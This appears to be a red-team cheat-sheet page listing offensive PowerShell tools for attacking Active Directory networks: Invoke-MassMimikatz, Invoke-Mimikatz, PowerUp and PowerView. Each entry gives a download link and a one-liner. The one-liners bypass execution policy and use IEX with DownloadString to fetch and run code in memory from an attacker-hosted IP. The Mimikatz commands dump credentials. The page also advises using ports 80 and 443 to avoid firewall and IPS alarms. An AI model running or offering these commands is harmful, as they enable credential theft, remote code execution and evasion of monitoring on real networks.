Important Scripts & Links

These are some of the important scripts that may be useful to a Red Team while exploring a network with Active Directory. There is a major overlap with the previous section, however the major difference here is that this is simply a list of scripts along with their usage and commands (if required). On the other hand, the previous section is based out of need/requirement and the best script/command that can be useful.

The heading to the tool gives a gist of its use and the section contains 2 parts,

  • Link to download the script

  • Command to download the script locally and execute it from memory

I have following the method of downloading the scripts to a local repo and then using them in the powershell command to download & execute since the targetted machines may not have internet.

I have also used 443 in the http link since I use either 80/443 for all such activities to avoid any alarms the firewall/IPS may raise. You can change it to the port from which you host the scripts.

Scripts

Invoke-MassMimikatz.ps1 # Dump Credentials on remote host

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.121:443/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
Invoke-Mimikatz.ps1 # Dump Credentials from Memory

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
PowerUp.ps1 #Privilege Escalation Checks

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.119.208:443/PowerUp.ps1’);Invoke-AllChecks”
PowerView.ps1 #Network & AD Exploration

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/powerview.ps1')"

Read more about the commands,

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce

Last updated